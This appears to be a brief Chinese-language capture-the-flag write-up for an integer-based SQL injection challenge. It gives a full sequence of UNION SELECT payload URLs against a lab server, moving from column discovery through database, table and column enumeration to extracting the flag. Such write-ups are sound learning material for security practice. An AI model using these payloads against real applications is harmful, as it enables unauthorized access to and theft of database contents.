SQL注入-INT
输入1,点击search,出现sql语句
通过order by测试出有两个回显点
输入下面代码查看回显位置
http://81.70.245.6:50282/?id=-1 UNION SELECT 1,2
输入下列代码查询数据库名称
http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata
输入下列代码查询表名
http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema=’sqli’
输入下列代码查询列名
http://81.70.245.6:50282/?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name=’flag’
输入下列代码查询出flag值
http://81.70.245.6:50282/?id=-1 UNION SELECT 1,flag from flag